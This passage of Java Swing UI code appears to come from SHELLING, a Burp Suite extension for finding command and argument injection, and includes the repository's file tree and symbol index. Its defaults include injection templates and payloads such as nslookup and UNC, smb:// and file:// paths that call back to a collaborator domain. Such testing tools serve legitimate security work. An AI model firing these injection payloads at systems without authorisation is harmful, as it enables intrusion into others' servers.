byteGeneratorRangeCombo = new javax.swing.JComboBox<>();
jCheckBox5.setText("jCheckBox5");
jLabel3.setText("Command to use");
targetOSCombo.setModel(new javax.swing.DefaultComboBoxModel<>(new String[] { "All (default)", "Windows", "Nix" }));
targetOSCombo.addActionListener(new java.awt.event.ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
targetOSComboActionPerformed(evt);
}
});
jLabel4.setText("Target OS");
argumentField.setText("PAYLOAD_MARK.BURP_COLLAB_DOMAIN");
argumentField.addKeyListener(new java.awt.event.KeyAdapter() {
public void keyReleased(java.awt.event.KeyEvent evt) {
ShellingPanel2.this.keyReleased(evt);
}
});
jLabel5.setText("Argument");
commandField.setText("nslookup");
payloadMarkingBox.setSelected(true);
payloadMarkingBox.setText("Payload marking");
payloadMarkingBox.addActionListener(new java.awt.event.ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
payloadMarkingBoxActionPerformed(evt);
}
});
scannerChecksBox.setSelected(true);
scannerChecksBox.setText("Active scanning");
scannerChecksBox.addActionListener(new java.awt.event.ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
scannerChecksBoxActionPerformed(evt);
}
});
feedbackChannelCombo.setModel(new javax.swing.DefaultComboBoxModel<>(new String[] { "DNS (collaborator)", "Delay (sleep)" }));
feedbackChannelCombo.addActionListener(new java.awt.event.ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
feedbackChannelComboActionPerformed(evt);
}
});
jLabel7.setText("Feedback channel");
delayTimeSpinner.setModel(new javax.swing.SpinnerNumberModel(25, 10, null, 1));
delayTimeSpinner.setEnabled(false);
delayTimeSpinner.setValue(25);
jLabel10.setText("Delay [s]");
manualModeCheckBox.setToolTipText("");
manualModeCheckBox.setLabel("Manual (non-auto) mode for Intruder & export (please refer the documentation for details)");
manualModeCheckBox.addActionListener(new java.awt.event.ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
manualModeCheckBoxActionPerformed(evt);
}
});
stopAllRunningScans.setText("Stop all running scans");
stopAllRunningScans.addActionListener(new java.awt.event.ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
stopAllRunningScansActionPerformed(evt);
}
});
javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1);
jPanel1.setLayout(jPanel1Layout);
jPanel1Layout.setHorizontalGroup(
jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel1Layout.createSequentialGroup()
.addContainerGap()
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addComponent(manualModeCheckBox, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
.addGroup(jPanel1Layout.createSequentialGroup()
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel1Layout.createSequentialGroup()
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING, false)
.addComponent(jLabel3, javax.swing.GroupLayout.DEFAULT_SIZE, 235, Short.MAX_VALUE)
.addComponent(jLabel5, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))
.addComponent(jLabel4, javax.swing.GroupLayout.PREFERRED_SIZE, 249, javax.swing.GroupLayout.PREFERRED_SIZE))
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addComponent(targetOSCombo, javax.swing.GroupLayout.PREFERRED_SIZE, 292, javax.swing.GroupLayout.PREFERRED_SIZE)
.addComponent(commandField, javax.swing.GroupLayout.PREFERRED_SIZE, 297, javax.swing.GroupLayout.PREFERRED_SIZE)
.addComponent(argumentField, javax.swing.GroupLayout.PREFERRED_SIZE, 564, javax.swing.GroupLayout.PREFERRED_SIZE)))
.addGroup(jPanel1Layout.createSequentialGroup()
.addComponent(jLabel7, javax.swing.GroupLayout.PREFERRED_SIZE, 374, javax.swing.GroupLayout.PREFERRED_SIZE)
.addGap(32, 32, 32)
.addComponent(feedbackChannelCombo, javax.swing.GroupLayout.PREFERRED_SIZE, 401, javax.swing.GroupLayout.PREFERRED_SIZE)))
.addGap(28, 28, 28)
.addComponent(jLabel10, javax.swing.GroupLayout.PREFERRED_SIZE, 138, javax.swing.GroupLayout.PREFERRED_SIZE)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(delayTimeSpinner, javax.swing.GroupLayout.PREFERRED_SIZE, 84, javax.swing.GroupLayout.PREFERRED_SIZE)
.addGap(0, 747, Short.MAX_VALUE))
.addGroup(jPanel1Layout.createSequentialGroup()
.addComponent(payloadMarkingBox, javax.swing.GroupLayout.PREFERRED_SIZE, 307, javax.swing.GroupLayout.PREFERRED_SIZE)
.addGap(107, 107, 107)
.addComponent(scannerChecksBox, javax.swing.GroupLayout.PREFERRED_SIZE, 330, javax.swing.GroupLayout.PREFERRED_SIZE)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
.addComponent(stopAllRunningScans, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)))
.addContainerGap())
);
jPanel1Layout.setVerticalGroup(
jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel1Layout.createSequentialGroup()
.addGap(9, 9, 9)
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addComponent(targetOSCombo, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
.addComponent(jLabel4, javax.swing.GroupLayout.PREFERRED_SIZE, 35, javax.swing.GroupLayout.PREFERRED_SIZE))
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
.addComponent(jLabel3, javax.swing.GroupLayout.PREFERRED_SIZE, 35, javax.swing.GroupLayout.PREFERRED_SIZE)
.addComponent(commandField, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE))
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING, false)
.addComponent(argumentField)
.addComponent(jLabel5, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))
.addGap(18, 18, 18)
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addComponent(payloadMarkingBox)
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
.addComponent(scannerChecksBox, javax.swing.GroupLayout.PREFERRED_SIZE, 25, javax.swing.GroupLayout.PREFERRED_SIZE)
.addComponent(stopAllRunningScans)))
.addGap(8, 8, 8)
.addComponent(manualModeCheckBox)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
.addComponent(jLabel10, javax.swing.GroupLayout.PREFERRED_SIZE, 35, javax.swing.GroupLayout.PREFERRED_SIZE)
.addComponent(delayTimeSpinner, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE))
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING, false)
.addComponent(jLabel7, javax.swing.GroupLayout.Alignment.LEADING, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
.addComponent(feedbackChannelCombo, javax.swing.GroupLayout.Alignment.LEADING)))
.addGap(0, 505, Short.MAX_VALUE))
);
jTabbedPane1.addTab("Global settings", jPanel1);
doCommandInjection.setSelected(true);
doCommandInjection.setText("Test for command injection");
doCommandInjection.addActionListener(new java.awt.event.ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
doCommandInjectionActionPerformed(evt);
}
});
advancedPayloadLabel.setText("Use the following syntaxes (see the manual for details on base syntaxes)");
basePayloadCheckBox.setSelected(true);
basePayloadCheckBox.setText("COMMAND (this is the base payload (don't uncheck unless you know what you're doing)");
secondBasePayloadCheckBox.setText("COMMAND + COMMAND_TERMINATOR");
thirdBasePayloadCheckBox.setText("COMMAND_SEPARATOR + COMMAND");
fourthBasePayloadCheckBox.setText("COMMAND_SEPARATOR + COMMAND + COMMAND_SEPARATOR");
fifthBasePayloadCheckBox.setText("COMMAND_SEPARATOR + COMMAND + COMMAND_SEPARATOR + SUFFIX ");
seventhBasePayloadCheckBox.setSelected(true);
seventhBasePayloadCheckBox.setText("PREFIX + COMMAND_SEPARATOR + COMMAND + COMMAND_SEPARATOR + SUFFIX");
sixthBasePayloadCheckBox.setText("PREFIX + COMMAND_SEPARATOR + COMMAND + COMMAND_SEPARATOR");
eightBasePayloadCheckBox.setText("PREFIX + COMMAND + SUFFIX");
javax.swing.GroupLayout panel1Layout = new javax.swing.GroupLayout(panel1);
panel1.setLayout(panel1Layout);
panel1Layout.setHorizontalGroup(
panel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(panel1Layout.createSequentialGroup()
.addContainerGap()
.addGroup(panel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(panel1Layout.createSequentialGroup()
.addGroup(panel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING, false)
.addComponent(basePayloadCheckBox, javax.swing.GroupLayout.DEFAULT_SIZE, 1040, Short.MAX_VALUE)
.addComponent(advancedPayloadLabel, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
.addComponent(doCommandInjection, javax.swing.GroupLayout.DEFAULT_SIZE, 1031, Short.MAX_VALUE)
.addComponent(secondBasePayloadCheckBox, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
.addComponent(thirdBasePayloadCheckBox, javax.swing.GroupLayout.DEFAULT_SIZE, 1040, Short.MAX_VALUE)
.addComponent(fourthBasePayloadCheckBox, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
.addComponent(fifthBasePayloadCheckBox, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))
.addGap(0, 794, Short.MAX_VALUE))
.addComponent(seventhBasePayloadCheckBox, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
.addComponent(sixthBasePayloadCheckBox, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
.addComponent(eightBasePayloadCheckBox, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))
.addContainerGap())
);
panel1Layout.setVerticalGroup(
panel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(panel1Layout.createSequentialGroup()
.addContainerGap()
.addComponent(doCommandInjection)
.addGap(18, 18, 18)
.addComponent(advancedPayloadLabel, javax.swing.GroupLayout.PREFERRED_SIZE, 30, javax.swing.GroupLayout.PREFERRED_SIZE)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(basePayloadCheckBox)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(secondBasePayloadCheckBox)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(thirdBasePayloadCheckBox)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(fourthBasePayloadCheckBox, javax.swing.GroupLayout.PREFERRED_SIZE, 25, javax.swing.GroupLayout.PREFERRED_SIZE)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(fifthBasePayloadCheckBox)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(sixthBasePayloadCheckBox)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(seventhBasePayloadCheckBox)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(eightBasePayloadCheckBox)
.addContainerGap(417, Short.MAX_VALUE))
);
jTabbedPane1.addTab("Command injection", panel1);
argInjectionCheckBox.setText("Test for argument injection");
argInjectionCheckBox.addActionListener(new java.awt.event.ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
argInjectionCheckBoxActionPerformed(evt);
}
});
fixedArguments.setText("Check known injections");
fixedArguments.setEnabled(false);
fixedArguments.addActionListener(new java.awt.event.ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
fixedArgumentsActionPerformed(evt);
}
});
bruteArgInjections.setSelected(true);
bruteArgInjections.setText("Brute force argument flags");
bruteArgInjections.setEnabled(false);
bruteArgInjections.addActionListener(new java.awt.event.ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
bruteArgInjectionsActionPerformed(evt);
}
});
injectHTTPCheckBox.setSelected(true);
injectHTTPCheckBox.setText("http://BURP_COLLAB_DOMAIN/a");
injectHTTPCheckBox.setEnabled(false);
injectHTTPCheckBox.addActionListener(new java.awt.event.ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
injectHTTPCheckBoxActionPerformed(evt);
}
});
injectFileCheckBox.setSelected(true);
injectFileCheckBox.setText("file://BURP_COLLAB_DOMAIN/a");
injectFileCheckBox.setEnabled(false);
uncPathsCheckBox.setSelected(true);
uncPathsCheckBox.setText(">\\\\BURP_COLLAB_DOMAIN\\o");
uncPathsCheckBox.setEnabled(false);
injectSmbCheckBox.setText("smb://BURP_COLLAB_DOMAIN/a");
injectSmbCheckBox.setEnabled(false);
injectUncCheckBox.setSelected(true);
injectUncCheckBox.setText("\\\\BURP_COLLAB_DOMAIN\\a");
injectUncCheckBox.setToolTipText("UNC paths");
injectUncCheckBox.setEnabled(false);
jLabel6.setText("Use the following argument values");
injectAdditionalArguments.setSelected(true);
injectAdditionalArguments.setText("Inject additional arguments directly (without flags)");
injectAdditionalArguments.setEnabled(false);
injectAdditionalArguments.addActionListener(new java.awt.event.ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
injectAdditionalArgumentsActionPerformed(evt);
}
});
jLabel11.setText("win-specific");
defaultArgBruteRange.setSelected(true);
defaultArgBruteRange.setText("Default range (a-zA-Z, LOTS of payloads)");
defaultArgBruteRange.setEnabled(false);
defaultArgBruteRange.addActionListener(new java.awt.event.ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
defaultArgBruteRangeActionPerformed(evt);
}
});
customArgBruteRange.setText("Custom character range:");
customArgBruteRange.setEnabled(false);
customArgBruteRange.addActionListener(new java.awt.event.ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
customArgBruteRangeActionPerformed(evt);
}
});
customCharacterRange.setText("abcdefghijklmnroqprstuvxyzACDEEFGHIJCKLMNROQPRSTUVXYZ");
customCharacterRange.setEnabled(false);
javax.swing.GroupLayout jPanel5Layout = new javax.swing.GroupLayout(jPanel5);
jPanel5.setLayout(jPanel5Layout);
jPanel5Layout.setHorizontalGroup(
jPanel5Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel5Layout.createSequentialGroup()
.addGroup(jPanel5Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel5Layout.createSequentialGroup()
.addGroup(jPanel5Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel5Layout.createSequentialGroup()
.addContainerGap()
.addComponent(fixedArguments, javax.swing.GroupLayout.PREFERRED_SIZE, 463, javax.swing.GroupLayout.PREFERRED_SIZE))
.addComponent(jLabel11, javax.swing.GroupLayout.PREFERRED_SIZE, 256, javax.swing.GroupLayout.PREFERRED_SIZE))
.addGap(37, 37, 37)
.addComponent(argInjectionCheckBox, javax.swing.GroupLayout.PREFERRED_SIZE, 388, javax.swing.GroupLayout.PREFERRED_SIZE))
.addGroup(jPanel5Layout.createSequentialGroup()
.addContainerGap()
.addGroup(jPanel5Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addComponent(uncPathsCheckBox, javax.swing.GroupLayout.PREFERRED_SIZE, 467, javax.swing.GroupLayout.PREFERRED_SIZE)
.addGroup(jPanel5Layout.createSequentialGroup()
.addGap(486, 486, 486)
.addGroup(jPanel5Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel5Layout.createSeque
gitextract__g4nibil/
├── BappDescription.html
├── BappManifest.bmf
├── DETECTING_ARGUMENT_INJECTION.md
├── Java/
│ └── src/
│ ├── burp/
│ │ ├── BinaryPayloadIssue.java
│ │ ├── BuildUnencodedRequest.java
│ │ ├── BurpExtender.java
│ │ ├── DirectScannerCheck.java
│ │ ├── ShellingScannerCheck.java
│ │ └── ShellingScannerIssue.java
│ └── uk/
│ └── co/
│ └── pentest/
│ └── SHELLING/
│ ├── IntruderPayloadGenerator.java
│ ├── IntruderPayloadGeneratorByte.java
│ ├── PayloadFactory.java
│ ├── SHELLING.java
│ ├── ShellingPanel2.form
│ ├── ShellingPanel2.java
│ ├── ShellingTab.java
│ ├── SimpleDocumentListener.java
│ └── collabSession.java
├── README.md
├── SHELLING.jar
├── TODO.txt
├── VERY_DEPRECATED_AND_NO_LONGER_MAINTAINED_shelling.pl
├── build.gradle
├── settings.gradle
└── test_cases/
├── arginj1.php
├── arginj_escape_shell_cmd.php
├── arginj_wget_doublequote.php
├── arginj_wget_noquotes.php
├── arginj_wget_singlequote.php
├── escape_cmd_shell_direct.php
├── escape_shell_cmd.php
├── lax_domain_name.php
├── no_colon_no_pipe_no_ampersand_no_dollar.php
├── no_space.php
├── no_space_no_colon_no_pipe_no_ampersand.php
├── no_white_chars.php
├── no_white_chars_no_colon_no_pipe_no_ampersand.php
├── no_white_chars_no_colon_no_pipe_no_ampersand_and_quote.php
├── no_white_chars_no_colon_no_pipe_no_ampersand_no_dollar.php
├── no_white_chars_start_alphanum.php
├── no_white_chars_start_digit.php
├── no_white_chars_stop_alnum.php
├── no_white_chars_stop_alphanum.php
├── no_white_chars_windows_blind.php
├── no_white_space_no_colon_no_pipe_no_ampersand_no_dollar.php
├── simple.php
├── simple_nested_quotes1.php
├── simple_no_spaces.php
├── simple_start_alphanum.php
├── simple_stop_alphanum.php
└── tar.php
SYMBOL INDEX (137 symbols across 19 files)
FILE: Java/src/burp/BinaryPayloadIssue.java
class BinaryPayloadIssue (line 6) | public class BinaryPayloadIssue extends ShellingScannerIssue {
method BinaryPayloadIssue (line 11) | public BinaryPayloadIssue(IBurpExtenderCallbacks cb,IHttpRequestRespon...
method appendIssueDetail (line 15) | public void appendIssueDetail(String text)
method getIssueDetail (line 19) | @Override
FILE: Java/src/burp/BuildUnencodedRequest.java
class BuildUnencodedRequest (line 5) | public class BuildUnencodedRequest
method BuildUnencodedRequest (line 10) | BuildUnencodedRequest(IExtensionHelpers helpers)
method buildUnencodedRequest (line 15) | byte[] buildUnencodedRequest(IScannerInsertionPoint iScannerInsertionP...
method buildCanary (line 24) | private byte[] buildCanary(int payloadLength)
method findCanary (line 36) | private int findCanary(byte[] canary, byte[] request) throws Exception
FILE: Java/src/burp/BurpExtender.java
class BurpExtender (line 11) | public class BurpExtender implements IBurpExtender, IExtensionStateListe...
method registerExtenderCallbacks (line 13) | @Override
method extensionUnloaded (line 29) | @Override
method getBurpCallbacks (line 32) | public static IBurpExtenderCallbacks getBurpCallbacks() {
FILE: Java/src/burp/DirectScannerCheck.java
class DirectScannerCheck (line 19) | public class DirectScannerCheck extends ShellingScannerCheck {
method DirectScannerCheck (line 27) | public DirectScannerCheck(IBurpExtenderCallbacks cb, ShellingTab tab)
method consolidateDuplicateIssues (line 34) | @Override
method doActiveScan (line 39) | @Override
FILE: Java/src/burp/ShellingScannerCheck.java
class ShellingScannerCheck (line 13) | abstract class ShellingScannerCheck implements IScannerCheck {
method ShellingScannerCheck (line 20) | public ShellingScannerCheck(IBurpExtenderCallbacks cb, ShellingTab tab) {
method createCheckHttpService (line 24) | protected boolean createCheckHttpService(String host, int port, boolea...
method doPassiveScan (line 49) | @Override
method consolidateDuplicateIssues (line 54) | @Override
method doActiveScan (line 57) | @Override
FILE: Java/src/burp/ShellingScannerIssue.java
class ShellingScannerIssue (line 7) | abstract public class ShellingScannerIssue implements IScanIssue {
method ShellingScannerIssue (line 22) | ShellingScannerIssue(IBurpExtenderCallbacks cb,IHttpRequestResponse ex...
method getConfidence (line 40) | @Override
method getHttpMessages (line 45) | @Override
method getHttpService (line 50) | @Override
method getIssueBackground (line 55) | @Override
method getIssueDetail (line 60) | @Override
method getIssueName (line 63) | @Override
method getIssueType (line 68) | @Override
method getRemediationBackground (line 73) | @Override
method getRemediationDetail (line 78) | @Override
method getSeverity (line 82) | @Override
method getUrl (line 87) | @Override
FILE: Java/src/uk/co/pentest/SHELLING/IntruderPayloadGenerator.java
class IntruderPayloadGenerator (line 20) | public final class IntruderPayloadGenerator implements IIntruderPayloadG...
method IntruderPayloadGenerator (line 64) | public IntruderPayloadGenerator(String payloadType, ShellingTab tab, S...
method generateTerminalInjectionPayloads (line 380) | private void generateTerminalInjectionPayloads()
method generateCommandInjectionPayloads (line 403) | private void generateCommandInjectionPayloads()
method generateArgumentInjectionPayloads (line 570) | private void generateArgumentInjectionPayloads()
method encodeOutput (line 733) | private void encodeOutput()
method setBase (line 785) | public boolean setBase(IHttpRequestResponse base)
method getMarkedVersion (line 798) | private String getMarkedVersion(String payload)
method byteToString (line 816) | private String byteToString(byte inputByte)
method arraySearch (line 822) | private boolean arraySearch(String needle, String[] hayStack)
method toStringArray (line 830) | private String[] toStringArray(ArrayList<String> input)
method incompatibleTargets (line 840) | private boolean incompatibleTargets(String entity, String payload, Str...
method getProperSuffix (line 930) | private String getProperSuffix(String prefix)
method hasMorePayloads (line 946) | @Override
method getPayload (line 974) | public String getPayload(int index)
method getNextPayloadSmart (line 979) | public byte[] getNextPayloadSmart(byte[] baseValue, boolean last400Avo...
method getNextPayload (line 984) | @Override
method reset (line 1058) | @Override
FILE: Java/src/uk/co/pentest/SHELLING/IntruderPayloadGeneratorByte.java
class IntruderPayloadGeneratorByte (line 18) | public final class IntruderPayloadGeneratorByte implements IIntruderPayl...
method IntruderPayloadGeneratorByte (line 26) | public IntruderPayloadGeneratorByte(ShellingTab tab)
method hasMorePayloads (line 204) | @Override
method getNextPayload (line 210) | @Override
method reset (line 219) | @Override
FILE: Java/src/uk/co/pentest/SHELLING/PayloadFactory.java
class PayloadFactory (line 16) | public class PayloadFactory implements IIntruderPayloadGeneratorFactory{
method PayloadFactory (line 21) | public PayloadFactory(ShellingTab tab, String payloadType) {
method getGeneratorName (line 26) | @Override
method createNewInstance (line 42) | @Override
FILE: Java/src/uk/co/pentest/SHELLING/SHELLING.java
class SHELLING (line 8) | public class SHELLING {
FILE: Java/src/uk/co/pentest/SHELLING/ShellingPanel2.java
class ShellingPanel2 (line 35) | public class ShellingPanel2 extends javax.swing.JPanel {
method ShellingPanel2 (line 83) | public ShellingPanel2()
method getDelay (line 98) | public int getDelay()
method appendListData (line 102) | protected void appendListData(JList list, String[] items)
method removeFromListData (line 116) | private void removeFromListData(JList list, String item)
method initiateEncodings (line 126) | private void initiateEncodings() // same as clear, no encoding by default
method initComponents (line 137) | @SuppressWarnings("unchecked")
method jButton4ActionPerformed (line 947) | private void jButton4ActionPerformed(java.awt.event.ActionEvent evt) {...
method targetOSComboActionPerformed (line 952) | private void targetOSComboActionPerformed(java.awt.event.ActionEvent e...
method feedbackChannelComboActionPerformed (line 962) | private void feedbackChannelComboActionPerformed(java.awt.event.Action...
method updatePayloadMarkingHolder (line 974) | private void updatePayloadMarkingHolder()
method payloadMarkingBoxActionPerformed (line 996) | private void payloadMarkingBoxActionPerformed(java.awt.event.ActionEve...
method scannerChecksBoxActionPerformed (line 1000) | private void scannerChecksBoxActionPerformed(java.awt.event.ActionEven...
method removeEncodingActionPerformed (line 1012) | private void removeEncodingActionPerformed(java.awt.event.ActionEvent ...
method encodingsToUseActionPerformed (line 1018) | private void encodingsToUseActionPerformed(java.awt.event.ActionEvent ...
method byteGeneratorRangeComboActionPerformed (line 1030) | private void byteGeneratorRangeComboActionPerformed(java.awt.event.Act...
method generatePayloads (line 1069) | protected void generatePayloads()
method saveToFileButtonActionPerformed (line 1091) | private void saveToFileButtonActionPerformed(java.awt.event.ActionEven...
method saveToClipBoardButtonActionPerformed (line 1134) | private void saveToClipBoardButtonActionPerformed(java.awt.event.Actio...
method useTerminatorsCheckBoxActionPerformed (line 1157) | private void useTerminatorsCheckBoxActionPerformed(java.awt.event.Acti...
method keyReleased (line 1186) | private void keyReleased(java.awt.event.KeyEvent evt) {//GEN-FIRST:eve...
method containsBaddies (line 1194) | public boolean containsBaddies(byte[] payload)
method argInjectionCheckBoxActionPerformed (line 1205) | private void argInjectionCheckBoxActionPerformed(java.awt.event.Action...
method manualModeCheckBoxActionPerformed (line 1275) | private void manualModeCheckBoxActionPerformed(java.awt.event.ActionEv...
method verboseOutputCheckBoxActionPerformed (line 1287) | private void verboseOutputCheckBoxActionPerformed(java.awt.event.Actio...
method stopAllRunningScansActionPerformed (line 1301) | private void stopAllRunningScansActionPerformed(java.awt.event.ActionE...
method flushTheTrackerButtonActionPerformed (line 1306) | private void flushTheTrackerButtonActionPerformed(java.awt.event.Actio...
method checkForInteractionsActionPerformed (line 1317) | private void checkForInteractionsActionPerformed(java.awt.event.Action...
method fixedArgumentsActionPerformed (line 1322) | private void fixedArgumentsActionPerformed(java.awt.event.ActionEvent ...
method argInjectArgumentsUI (line 1343) | private void argInjectArgumentsUI()
method injectAdditionalArgumentsActionPerformed (line 1382) | private void injectAdditionalArgumentsActionPerformed(java.awt.event.A...
method bruteArgInjectionsActionPerformed (line 1387) | private void bruteArgInjectionsActionPerformed(java.awt.event.ActionEv...
method injectHTTPCheckBoxActionPerformed (line 1392) | private void injectHTTPCheckBoxActionPerformed(java.awt.event.ActionEv...
method customArgBruteRangeActionPerformed (line 1397) | private void customArgBruteRangeActionPerformed(java.awt.event.ActionE...
method defaultArgBruteRangeActionPerformed (line 1411) | private void defaultArgBruteRangeActionPerformed(java.awt.event.Action...
method doTerminalInjectionActionPerformed (line 1425) | private void doTerminalInjectionActionPerformed(java.awt.event.ActionE...
method doCommandInjectionActionPerformed (line 1438) | private void doCommandInjectionActionPerformed(java.awt.event.ActionEv...
method removeTerminatorButtonActionPerformed (line 1464) | private void removeTerminatorButtonActionPerformed(java.awt.event.Acti...
method addTerminatorButtonActionPerformed (line 1481) | private void addTerminatorButtonActionPerformed(java.awt.event.ActionE...
method terminatorASCIIFormatActionPerformed (line 1506) | private void terminatorASCIIFormatActionPerformed(java.awt.event.Actio...
method terminatorHexFormatActionPerformed (line 1543) | private void terminatorHexFormatActionPerformed(java.awt.event.ActionE...
method includeLiteralWhitesActionPerformed (line 1548) | private void includeLiteralWhitesActionPerformed(java.awt.event.Action...
method switchToHex (line 1559) | protected void switchToHex()
method disableAuto (line 1586) | private void disableAuto()
method enableAuto (line 1597) | private void enableAuto()
method flushThetracker (line 1610) | private void flushThetracker() // used to initiate and reset (if reque...
method checkCollabInteractions (line 1615) | public void checkCollabInteractions(boolean manual)
method collabSessionID (line 1849) | protected int collabSessionID(String collabLocation)
method logOutput (line 1860) | public void logOutput(String msg)
method logDebug (line 1865) | public void logDebug(String msg) // only called when verboseOutput == ...
FILE: Java/src/uk/co/pentest/SHELLING/ShellingTab.java
class ShellingTab (line 9) | public class ShellingTab implements ITab {
method findTab (line 14) | public void findTab() {
method alertTab (line 29) | void alertTab() {
method getTabCaption (line 33) | @Override
method getUiComponent (line 38) | @Override
FILE: Java/src/uk/co/pentest/SHELLING/SimpleDocumentListener.java
class SimpleDocumentListener (line 10) | public abstract class SimpleDocumentListener implements DocumentListener {
method insertUpdate (line 11) | @Override
method removeUpdate (line 16) | @Override
FILE: Java/src/uk/co/pentest/SHELLING/collabSession.java
class collabSession (line 17) | public class collabSession {
method collabSession (line 31) | public collabSession(String loc, String act, IHttpRequestResponse valu...
method setReqResp (line 40) | public void setReqResp(IHttpRequestResponse value)
method getLoc (line 44) | public String getLoc()
method getCreated (line 48) | public String getCreated()
method setShellingsRaw (line 53) | public void setShellingsRaw(ArrayList raw)
method setCount (line 57) | public void setCount(int c)
method getShellingsRaw (line 61) | public ArrayList<String> getShellingsRaw()
method setInsertionPointName (line 65) | public void setInsertionPointName(String n)
method getInsertionPointName (line 69) | public String getInsertionPointName()
FILE: test_cases/arginj1.php
function cmd_exec (line 6) | function cmd_exec($cmd, &$stdout, &$stderr)
